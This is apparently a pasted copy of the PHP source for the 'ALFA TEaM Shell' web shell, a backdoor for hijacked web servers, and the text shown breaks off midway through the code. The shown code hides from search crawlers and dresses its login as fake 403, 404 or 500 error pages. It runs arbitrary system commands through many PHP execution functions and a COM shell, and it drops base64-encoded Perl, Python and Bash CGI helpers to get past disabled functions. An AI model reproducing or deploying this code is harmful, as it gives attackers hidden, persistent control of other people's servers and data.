· 5 years ago · May 13, 2020, 04:36 AM
1// W4r10k
2// Kurd-h.org
3// Mezopotamiahackers.org
4// kuralinux@gmail.com
5<?php
6$GLOBALS['DB_NAME'] = array(
7 'user' => 'admin',
8 'pass' => '56aed7e7485ff03d5605b885b86e947e',//alfa
9 'safemode' => '0',
10 'login_page' => '403',
11 'show_icons' => '1',
12 'post_encryption' => false,
13 'color' => array("shell_border" => "#0E304A","header_vars" => "#27979B","header_values" => "#67ABDF","header_on" => "#00FF00","header_off" => "#ff0000","header_none" => "#00FF00","home_shell" => "#ff0000","home_shell:hover" => "#FFFFFF","back_shell" => "#efbe73","back_shell:hover" => "#FFFFFF","header_pwd" => "#00FF00","header_pwd:hover" => "#FFFFFF","header_drive" => "#00FF00","header_drive:hover" => "#FFFFFF","header_show_all" => "#00FF00","disable_functions" => "#ff0000","footer_text" => "#27979B","menu_options" => "#27979B","menu_options:hover" => "#646464","options_list" => "#00FF00","options_list:hover" => "#FFFFFF","options_list_header" => "#59cc33","options_list_text" => "#FFFFFF","Alfa+" => "#27E8AE","hidden_shell_text" => "#00FF00","hidden_shell_version" => "#ff0000","shell_name" => "#FF0000","main_row:hover" => "#646464","main_header" => "#FFFFFF","main_name" => "#FFFFFF","main_size" => "#67ABDF","main_modify" => "#67ABDF","main_owner_group" => "#67ABDF","main_green_perm" => "#25ff00","main_red_perm" => "#FF0000","main_white_perm" => "#FFFFFF","beetween_perms" => "#FFFFFF","main_actions" => "#FFFFFF","minimize_editor_background" => "#0e304a","minimize_editor_text" => "#f5deb3","editor_border" => "#0e304a","editor_background" => "rgba(0, 1, 23, 0.94)","editor_header_background" => "rgba(21, 66, 88, 0.93)","editor_header_text" => "#00ff7f","editor_header_button" => "#1d5673","editor_actions" => "#FFFFFF","editor_file_info_vars" => "#FFFFFF","editor_file_info_values" => "#67ABDF","editor_history_header" => "#14ff07","editor_history_list" => "#03b3a3","editor_history_selected_file" => "rgba(49, 55, 93, 0.77)","editor_history_file:hover" => "#646464","input_box_border" => "#0E304A","input_box_text" => "#999999","input_box:hover" => "#27979B","select_box_border" => "#0E304A","select_box_text" => "#FFFFEE","select_box:hover" => "#27979B","button_border" => "#27979B","button:hover" => "#27979B","outputs_text" => "#67ABDF","outputs_border" => "#0E304A","uploader_border" => "#0E304A","uploader_background" => "#0E304A","uploader_text_right" => "#FFFFFF","uploader_text_left" => "#25ff00","uploader:hover" => "#27979B","uploader_progress_bar" => "#ff0000","mysql_tables" => "#00FF00","mysql_table_count" => "#67ABDF","copyright" => "#ff0000","scrollbar" => "#1e82b5","scrollbar_background" => "#000115",),
14);
15
16
17if(!function_exists('base64_encode')){
18function __ZW5jb2Rlcg($data){if(empty($data))return;$b64='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';$o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;$ac = 0;$enc = '';$tmp_arr = array();if(!$data){return data;}do{$o1 = charCodeAt($data, $i++);$o2 = charCodeAt($data, $i++);$o3 = charCodeAt($data, $i++);$bits = $o1 << 16 | $o2 << 8 | $o3;$h1 = $bits >> 18 & 0x3f;$h2 = $bits >> 12 & 0x3f;$h3 = $bits >> 6 & 0x3f;$h4 = $bits & 0x3f;$tmp_arr[$ac++] = charAt($b64, $h1).charAt($b64, $h2).charAt($b64, $h3).charAt($b64, $h4);} while ($i < strlen($data));$enc = implode($tmp_arr, '');$r = (strlen($data) % 3);return ($r ? substr($enc, 0, ($r - 3)) : $enc).substr('===', ($r || 3));}function charCodeAt($data, $char){ return ord(substr($data, $char, 1));}function charAt($data, $char){return substr($data, $char, 1);}
19}else{
20function __ZW5jb2Rlcg($s){return base64_encode($s);}
21}
22
23if(!function_exists('base64_decode')){
24function __ZGVjb2Rlcg($input){if(empty($input))return;$keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";$chr1 = $chr2 = $chr3 = "";$enc1 = $enc2 = $enc3 = $enc4 = "";$i = 0;$output = "";$input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);do{$enc1 = strpos($keyStr, substr($input, $i++, 1));$enc2 = strpos($keyStr, substr($input, $i++, 1));$enc3 = strpos($keyStr, substr($input, $i++, 1));$enc4 = strpos($keyStr, substr($input, $i++, 1));$chr1 = ($enc1 << 2) | ($enc2 >> 4);$chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);$chr3 = (($enc3 & 3) << 6) | $enc4;$output = $output . chr((int) $chr1);if ($enc3 != 64) {$output = $output . chr((int) $chr2);}if ($enc4 != 64) {$output = $output . chr((int) $chr3);}$chr1 = $chr2 = $chr3 = "";$enc1 = $enc2 = $enc3 = $enc4 = "";}while($i < strlen($input));return $output;}
25}else{
26function __ZGVjb2Rlcg($s){return base64_decode($s);}
27}
28
29if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}}
30if(!isset($GLOBALS['DB_NAME']['user']))exit('$GLOBALS[\'DB_NAME\'][\'user\']');
31if(!isset($GLOBALS['DB_NAME']['pass']))exit('$GLOBALS[\'DB_NAME\'][\'pass\']');
32if(!isset($GLOBALS['DB_NAME']['safemode']))exit('$GLOBALS[\'DB_NAME\'][\'safemode\']');
33if(!isset($GLOBALS['DB_NAME']['login_page']))exit('$GLOBALS[\'DB_NAME\'][\'login_page\']');
34if(!isset($GLOBALS['DB_NAME']['show_icons']))exit('$GLOBALS[\'DB_NAME\'][\'show_icons\']');
35if(!isset($GLOBALS['DB_NAME']['post_encryption']))exit('$GLOBALS[\'DB_NAME\'][\'post_encryption\']');
36date_default_timezone_set('Asia/Tehran');
37define("__ALFA_MD5NAME__", md5($_SERVER["SCRIPT_FILENAME"]));
38define("__ALFA_VERSION__", "3.0.2");
39define("__LAST_CWD__", "last_cwd_".__ALFA_MD5NAME__);
40define("__PATH_HISTORY__", "path_history_".__ALFA_MD5NAME__);
41define("__ALFA_POST_ENCRYPTION__", (isset($GLOBALS["DB_NAME"]["post_encryption"])&&$GLOBALS["DB_NAME"]["post_encryption"]==true?true:false));
42$GLOBALS['__ALFA_COLOR__'] = array(
43 "shell_border" => array(
44 "key_color" => "#0E304A",
45 "multi_selector" => array(
46 ".header" => "border: 7px solid {color}",
47 "#meunlist" => "border-color: {color}",
48 "#hidden_sh" => "background-color: {color}",
49 ".ajaxarea" => "border: 1px solid {color}",
50 ".foot" => "border-color: {color}",
51 )
52 ),
53 "header_vars" => "#27979B",
54 "header_values" => "#67ABDF",
55 "header_on" => "#00FF00",
56 "header_off" => "#ff0000",
57 "header_none" => "#00FF00",
58 "home_shell" => "#ff0000",
59 "home_shell:hover" => array(
60 "key_color" => "#FFFFFF",
61 "multi_selector" => array(
62 ".home_shell:hover" => "color: {color};",
63 )
64 ),
65 "back_shell" => "#efbe73",
66 "back_shell:hover" => array(
67 "key_color" => "#FFFFFF",
68 "multi_selector" => array(
69 ".back_shell:hover" => "color: {color};",
70 )
71 ),
72 "header_pwd" => "#00FF00",
73 "header_pwd:hover" => array(
74 "key_color" => "#FFFFFF",
75 "multi_selector" => array(
76 ".header_pwd:hover" => "color: {color};",
77 )
78 ),
79 "header_drive" => "#00FF00",
80 "header_drive:hover" => array(
81 "key_color" => "#FFFFFF",
82 "multi_selector" => array(
83 ".header_drive:hover" => "color: {color};",
84 )
85 ),
86 "header_show_all" => "#00FF00",
87 "disable_functions" => "#ff0000",
88 "footer_text" => "#27979B",
89 "menu_options" => "#27979B",
90 "menu_options:hover" => array(
91 "key_color" => "#646464",
92 "multi_selector" => array(
93 ".menu_options:hover" => "background-color: {color};font-weight: unset;",
94 )
95 ),
96 "options_list" => array(
97 "key_color" => "#00FF00",
98 "multi_selector" => array(
99 ".ajaxarea .header center a" => "color: {color};",
100 )
101 ),
102 "options_list:hover" => array(
103 "key_color" => "#FFFFFF",
104 "multi_selector" => array(
105 ".ajaxarea .header center a:hover" => "color: {color};",
106 )
107 ),
108 "options_list_header" => array(
109 "key_color" => "#59cc33",
110 "multi_selector" => array(
111 ".txtfont_header" => "color: {color};",
112 )
113 ),
114 "options_list_text" => array(
115 "key_color" => "#FFFFFF",
116 "multi_selector" => array(
117 ".txtfont,.tbltxt" => "color: {color};",
118 )
119 ),
120 "Alfa+" => array(
121 "key_color" => "#27E8AE",
122 "multi_selector" => array(
123 ".alfa_plus" => "color: {color};font-weight: unset;",
124 )
125 ),
126 "hidden_shell_text" => array(
127 "key_color" => "#00FF00",
128 "multi_selector" => array(
129 "#hidden_sh a" => "color: {color};",
130 )
131 ),
132 "hidden_shell_version" => "#ff0000",
133 "shell_name" => "#FF0000",
134 "main_row:hover" => array(
135 "key_color" => "#646464",
136 "multi_selector" => array(
137 ".main tr:hover" => "background-color: {color};",
138 )
139 ),
140 "main_header" => array(
141 "key_color" => "#FFFFFF",
142 "multi_selector" => array(
143 ".main th" => "color: {color};",
144 )
145 ),
146 "main_name" => array(
147 "key_color" => "#FFFFFF",
148 "multi_selector" => array(
149 ".main .main_name" => "color: {color};font-weight: unset;",
150 )
151 ),
152 "main_size" => "#67ABDF",
153 "main_modify" => "#67ABDF",
154 "main_owner_group" => "#67ABDF",
155 "main_green_perm" => "#25ff00",
156 "main_red_perm" => "#FF0000",
157 "main_white_perm" => "#FFFFFF",
158 "beetween_perms" => "#FFFFFF",
159 "main_actions" => array(
160 "key_color" => "#FFFFFF",
161 "multi_selector" => array(
162 ".main .actions" => "color: {color};",
163 )
164 ),
165 "menu_options:hover" => array(
166 "key_color" => "#646464",
167 "multi_selector" => array(
168 ".menu_options:hover" => "background-color: {color};font-weight: unset;",
169 )
170 ),
171 "minimize_editor_background" => array(
172 "key_color" => "#0e304a",
173 "multi_selector" => array(
174 ".minimized-wrapper" => "background-color: {color};",
175 )
176 ),
177 "minimize_editor_text" => array(
178 "key_color" => "#f5deb3",
179 "multi_selector" => array(
180 ".minimized-text" => "color: {color};",
181 )
182 ),
183 "editor_border" => array(
184 "key_color" => "#0e304a",
185 "multi_selector" => array(
186 ".editor-explorer,.editor-modal" => "border: 2px solid {color};",
187 )
188 ),
189 "editor_background" => array(
190 "key_color" => "rgba(0, 1, 23, 0.94)",
191 "multi_selector" => array(
192 ".editor-explorer,.editor-modal" => "background-color: {color};",
193 )
194 ),
195 "editor_header_background" => array(
196 "key_color" => "rgba(21, 66, 88, 0.93)",
197 "multi_selector" => array(
198 ".editor-header" => "background-color: {color};",
199 )
200 ),
201 "editor_header_text" => array(
202 "key_color" => "#00ff7f",
203 "multi_selector" => array(
204 ".editor-path" => "color: {color};",
205 )
206 ),
207 "editor_header_button" => array(
208 "key_color" => "#1d5673",
209 "multi_selector" => array(
210 ".close-button, .editor-minimize" => "background-color: {color};",
211 )
212 ),
213 "editor_actions" => array(
214 "key_color" => "#FFFFFF",
215 "multi_selector" => array(
216 ".editor_actions" => "color: {color};",
217 )
218 ),
219 "editor_file_info_vars" => array(
220 "key_color" => "#FFFFFF",
221 "multi_selector" => array(
222 ".editor_file_info_vars" => "color: {color};",
223 )
224 ),
225 "editor_file_info_values" => array(
226 "key_color" => "#67ABDF",
227 "multi_selector" => array(
228 ".filestools" => "color: {color};",
229 )
230 ),
231 "editor_history_header" => array(
232 "key_color" => "#14ff07",
233 "multi_selector" => array(
234 ".hheader-text,.history-clear" => "color: {color};",
235 )
236 ),
237 "editor_history_list" => array(
238 "key_color" => "#03b3a3",
239 "multi_selector" => array(
240 ".editor-file-name" => "color: {color};",
241 )
242 ),
243 "editor_history_selected_file" => array(
244 "key_color" => "rgba(49, 55, 93, 0.77)",
245 "multi_selector" => array(
246 ".is_active" => "background-color: {color};",
247 )
248 ),
249 "editor_history_file:hover" => array(
250 "key_color" => "#646464",
251 "multi_selector" => array(
252 ".file-holder > .history:hover" => "background-color: {color};",
253 )
254 ),
255 "input_box_border" => array(
256 "key_color" => "#0E304A",
257 "multi_selector" => array(
258 "input[type=text],textarea" => "border: 1px solid {color}",
259 )
260 ),
261 "input_box_text" => array(
262 "key_color" => "#999999",
263 "multi_selector" => array(
264 "input[type=text],textarea" => "color: {color};",
265 )
266 ),
267 "input_box:hover" => array(
268 "key_color" => "#27979B",
269 "multi_selector" => array(
270 "input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
271 )
272 ),
273 "select_box_border" => array(
274 "key_color" => "#0E304A",
275 "multi_selector" => array(
276 "select" => "border: 1px solid {color}",
277 )
278 ),
279 "select_box_text" => array(
280 "key_color" => "#FFFFEE",
281 "multi_selector" => array(
282 "select" => "color: {color};",
283 )
284 ),
285 "select_box:hover" => array(
286 "key_color" => "#27979B",
287 "multi_selector" => array(
288 "select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
289 )
290 ),
291 "button_border" => array(
292 "key_color" => "#27979B",
293 "multi_selector" => array(
294 "input[type=submit],.button,#addup" => "border: 1px solid {color};",
295 )
296 ),
297 "button:hover" => array(
298 "key_color" => "#27979B",
299 "multi_selector" => array(
300 "input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};",
301 ".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
302 )
303 ),
304 "outputs_text" => array(
305 "key_color" => "#67ABDF",
306 "multi_selector" => array(
307 ".ml1" => "color: {color};",
308 )
309 ),
310 "outputs_border" => array(
311 "key_color" => "#0E304A",
312 "multi_selector" => array(
313 ".ml1" => "border: 1px solid {color};",
314 )
315 ),
316 "uploader_border" => array(
317 "key_color" => "#0E304A",
318 "multi_selector" => array(
319 ".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};",
320 )
321 ),
322 "uploader_background" => array(
323 "key_color" => "#0E304A",
324 "multi_selector" => array(
325 ".inputfile strong" => "background-color: {color};",
326 )
327 ),
328 "uploader_text_right" => array(
329 "key_color" => "#FFFFFF",
330 "multi_selector" => array(
331 ".inputfile strong" => "color: {color};",
332 )
333 ),
334 "uploader_text_left" => array(
335 "key_color" => "#25ff00",
336 "multi_selector" => array(
337 ".inputfile span" => "color: {color};",
338 )
339 ),
340 "uploader:hover" => array(
341 "key_color" => "#27979B",
342 "multi_selector" => array(
343 ".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
344 )
345 ),
346 "uploader_progress_bar" => array(
347 "key_color" => "#ff0000",
348 "multi_selector" => array(
349 "#up_bar" => "background-color: {color};",
350 )
351 ),
352 "mysql_tables" => "#00FF00",
353 "mysql_table_count" => "#67ABDF",
354 "copyright" => "#ff0000",
355 "scrollbar" => array(
356 "key_color" => "#1e82b5",
357 "multi_selector" => array(
358 "*::-webkit-scrollbar-thumb" => "background-color: {color};",
359 )
360 ),
361 "scrollbar_background" => array(
362 "key_color" => "#000115",
363 "multi_selector" => array(
364 "*::-webkit-scrollbar-track" => "background-color: {color};",
365 )
366 ),
367);
368$GLOBALS['__file_path'] = str_replace('\\','/',trim(preg_replace('!\(\d+\)\s.*!', '', __FILE__)));
369$config = array('AlfaUser' => $GLOBALS['DB_NAME']['user'],'AlfaPass' => $GLOBALS['DB_NAME']['pass'],'AlfaProtectShell' => $GLOBALS['DB_NAME']['safemode'],'AlfaLoginPage' => $GLOBALS['DB_NAME']['login_page']);
370@session_start();
371if($config['AlfaProtectShell']){
372$SERVER_SIG = (isset($_SERVER["SERVER_SIGNATURE"])?$_SERVER["SERVER_SIGNATURE"]:"");
373$Eform='<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>';
374if($config['AlfaLoginPage'] == 'gui'){
375if(@$_SESSION["AlfaUser"] != $config['AlfaUser'] && @$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
376if(@$_POST["usrname"]==$config['AlfaUser'] && @md5($_POST["password"])==$config['AlfaPass']){
377@$_SESSION["AlfaUser"] = $config['AlfaUser'];
378@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
379@header('location: '.$_SERVER["PHP_SELF"]);
380}
381echo '
382<style>
383body{background: black;}
384#loginbox { font-size:11px; color:green; right:85px; width:1200px; height:200px; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }
385#loginbox td { border-radius:5px; font-size:11px; }
386</style>
387<title>~ ALFA TEaM Shell-v'.__ALFA_VERSION__.' ~</title><center>
388<center><img style="border-radius:100px;" width="500" height="250" alt="" src="http://solevisible.com/images/alfa-iran.png" /></center>
389<div id=loginbox><p><font face="verdana,arial" size=-1>
390<center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'>
391<tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>~ ALFA TEaM Shell-v'.__ALFA_VERSION__.' ~</b></font></th></tr>
392<tr><td bgcolor="black" style="padding:5">
393<form method="post">
394<input type="hidden" name="action" value="login">
395<input type="hidden" name="hide" value="">
396<center><table>
397<tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" placeholder="username" onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr>
398<tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="password" placeholder="password" onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr>
399<tr><td><font face="verdana,arial" size=-1> </font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Login"></font></td></tr></table>
400</div><br /></center>';
401exit;
402}
403}elseif($config['AlfaLoginPage']=='500'){
404if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
405if(@md5($_POST["password"])==$config['AlfaPass']){
406@$_SESSION["AlfaUser"] = $config['AlfaUser'];
407@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
408header('location: '.$_SERVER["PHP_SELF"]);
409}
410echo '<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, '.$_SERVER['SERVER_ADMIN'].' and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr>'.$SERVER_SIG.'</body></html>'.$Eform;
411exit;
412}
413}elseif($config['AlfaLoginPage']=='403'){
414if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
415if(@md5($_POST["password"])==$config['AlfaPass']){
416@$_SESSION["AlfaUser"] = $config['AlfaUser'];
417@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
418header('location: '.$_SERVER["PHP_SELF"]);
419}
420echo "<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access ".$_SERVER['PHP_SELF']." on this server.</p><hr>".$SERVER_SIG."</body></html>".$Eform;
421exit;
422}
423}elseif($config['AlfaLoginPage']=='404'){
424if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
425if(@md5($_POST["password"])==$config['AlfaPass']){
426@$_SESSION["AlfaUser"] = $config['AlfaUser'];
427@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
428header('location: '.$_SERVER["PHP_SELF"]);
429}
430echo "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL ".$_SERVER['PHP_SELF']." was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>".$SERVER_SIG."</body></html>".$Eform;
431exit;
432}
433}
434}
435function decrypt_post($str, $pwd){
436 if(__ALFA_POST_ENCRYPTION__){
437 $pwd = __ZW5jb2Rlcg($pwd);
438 $str = __ZGVjb2Rlcg($str);
439 $enc_chr = "";
440 $enc_str = "";
441 $i = 0;
442 while ($i < strlen($str)) {
443 for ($j = 0; $j < strlen($pwd); $j++) {
444 $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));
445 $enc_str .= $enc_chr;
446 $i++;
447 if ($i >= strlen($str))
448 break;
449 }
450 }
451 return __ZGVjb2Rlcg($enc_str);
452 }else{
453 return __ZGVjb2Rlcg($str);
454 }
455}
456
457function _AlfaSecretKey(){
458 if(!isset($_SESSION["AlfaSecretKey"])){
459 $_SESSION["AlfaSecretKey"] = uniqid(mt_rand(), true);
460 }
461 return $_SESSION["AlfaSecretKey"];
462}
463function alfa_getColor($target){
464 if(isset($GLOBALS["DB_NAME"]["color"][$target])&&$GLOBALS["DB_NAME"]["color"][$target]!=""){
465 return $GLOBALS["DB_NAME"]["color"][$target];
466 }else{
467 $target = $GLOBALS["__ALFA_COLOR__"][$target];
468 if(is_array($target)){
469 return $target["key_color"];
470 }else{
471 return $target;
472 }
473 }
474}
475function alfaCssLoadColors(){
476 $css = "";
477 foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
478 if(!is_array($value)){
479 $value = alfa_getColor($key);
480 $css .= ".{$key}{color: {$value};}";
481 }else{
482 if(isset($value["multi_selector"])){
483 foreach($value["multi_selector"] as $k => $v){
484 $color = alfa_getColor($key);
485 $code = str_replace("{color}", $color, $v);
486 $css .= $k."{".$code."}";
487 }
488 }
489 }
490 }
491 return $css;
492}
493if(isset($_POST['ajax'])){
494function AlfaNum(){
495$args = func_get_args();
496$alfax = array();
497$find = array();
498for($i=1;$i<=10;$i++){
499$alfax[] = $i;
500}
501foreach($args as $arg){
502$find[] = $arg;
503}
504echo '<script>';
505foreach($alfax as $alfa){
506if(in_array($alfa,$find))
507continue;
508echo 'alfa'.$alfa."_=";
509}
510echo '""</script>';
511}}
512function _alfa_cgicmd($cmd,$lang="perl"){
513 if(isset($_SESSION["alfacgiapi_mode"])){
514 return "";
515 }
516 $cmd_pure = $cmd;
517 $is_curl = function_exists('curl_version');
518 $is_socket = function_exists('fsockopen');
519 if($is_curl||$is_socket){
520 $recreate = false;
521 if(isset($_SESSION["alfacgiapi"])){
522 if(!@file_exists("alfacgiapi/".$_SESSION["alfacgiapi"].".alfa")){
523 $recreate = true;
524 $lang = $_SESSION["alfacgiapi"];
525 }
526 }
527 if(!isset($_SESSION["alfacgiapi"])||$recreate){
528 @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
529 $perl = 'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=';
530 $py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=";
531 $bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C";
532 if($lang=="perl")$source = $perl;elseif($lang=="py")$source = $py;else $source = $bash;
533 alfaWriteTocgiapi($lang.".alfa",$source);
534 alfacgihtaccess('cgi', "alfacgiapi/");
535 }else{
536 $lang = $_SESSION["alfacgiapi"];
537 }
538 $cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=".__ZW5jb2Rlcg("cd ".$GLOBALS['cwd'].";".$cmd);
539 if($is_curl){
540 $address = ($_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://").$_SERVER["SERVER_NAME"].dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa";
541 $post = new AlfaCURL();
542 $data = $post->Send($address, "post", $cmd);
543 }elseif($is_socket){
544 $server = $_SERVER["SERVER_NAME"];
545 $uri = dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa";
546 $data = _alfa_fsockopen($server,$uri,$cmd);
547 }
548 $out = "";
549 if(strstr($data, "[solevisible~api]")){
550 $_SESSION["alfacgiapi"] = $lang;
551 if(@preg_match("/<pre>(.*?)<\/pre>/s", $data, $res)){
552 $out = $res[1];
553 }
554 }elseif($lang=="perl"){
555 return _alfa_cgicmd($cmd_pure,"py");
556 }elseif($lang=="py"){
557 return _alfa_cgicmd($cmd_pure,"bash");
558 }else{
559 $_SESSION["alfacgiapi_mode"] = "off";
560 }
561 return trim($out);
562 }else{
563 return "";
564 }
565}
566function alfaEx($in,$re=false,$cgi=true,$all=false){
567 $data = _alfa_php_cmd($in,$re);
568 if(empty($data)&&$cgi||$all){
569 if($GLOBALS['sys']=='unix'){
570 if(strlen(_alfa_php_cmd("whoami"))==0||$all){
571 $cmd = _alfa_cgicmd($in);
572 if(!empty($cmd)){
573 return $cmd;
574 }
575 }
576 }
577 }
578 return $data;
579}
580function _alfa_php_cmd($in,$re=false){
581$out='';
582try{
583if($re)$in=$in." 2>&1";
584if(function_exists('exec')){
585@exec($in,$out);
586$out = @join("\n",$out);
587}elseif(function_exists('passthru')) {
588ob_start();
589@passthru($in);
590$out = ob_get_clean();
591}elseif(function_exists('system')){
592ob_start();
593@system($in);
594$out = ob_get_clean();
595} elseif (function_exists('shell_exec')) {
596$out = shell_exec($in);
597}elseif(function_exists("popen")&&function_exists("pclose")){
598if(is_resource($f = @popen($in,"r"))){
599$out = "";
600while(!@feof($f))
601$out .= fread($f,1024);
602pclose($f);
603}
604}elseif(function_exists('proc_open')){
605$pipes = array();
606$process = @proc_open($in.' 2>&1', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null);
607$out=@stream_get_contents($pipes[1]);
608}elseif(class_exists('COM')){
609$alfaWs = new COM('WScript.shell');
610$exec = $alfaWs->exec('cmd.exe /c '.$_POST['alfa1']);
611$stdout = $exec->StdOut();
612$out=$stdout->ReadAll();
613}
614}catch(Exception $e){}
615return $out;
616}
617function _alfa_fsockopen($server,$uri,$post){
618 $socket = @fsockopen($server, 80, $errno, $errstr, 15);
619 if($socket){
620 $http = "POST {$uri} HTTP/1.0\r\n";
621 $http .= "Host: {$server}\r\n";
622 $http .= "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n";
623 $http .= "Content-Type: application/x-www-form-urlencoded\r\n";
624 $http .= "Content-length: " . strlen($post) . "\r\n";
625 $http .= "Connection: close\r\n\r\n";
626 $http .= $post . "\r\n\r\n";
627 fwrite($socket, $http);
628 $contents = "";
629 while (!@feof($socket)) {
630 $contents .= @fgets($socket, 4096);
631 }
632 list($header, $body) = explode("\r\n\r\n", $contents, 2);
633 @fclose($socket);
634 return $body;
635 }else{
636 return "";
637 }
638}
639if(isset($_GET["solevisible"])){
640@error_reporting(E_ALL ^ E_NOTICE);
641echo '<html>';
642echo "<title>Solevisible Hidden Shell</title>";
643echo "<body bgcolor=#000000>";
644echo '<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">'.(function_exists('php_uname')?php_uname():'???').'</font></b></big>';
645$safe_mode = @ini_get('safe_mode');
646if($safe_mode){$r = "<b style='color: red'>On</b>";}else{$r = "<b style='color: green'>Off</b>";}
647echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>" . PHP_OS . "</font><br>";
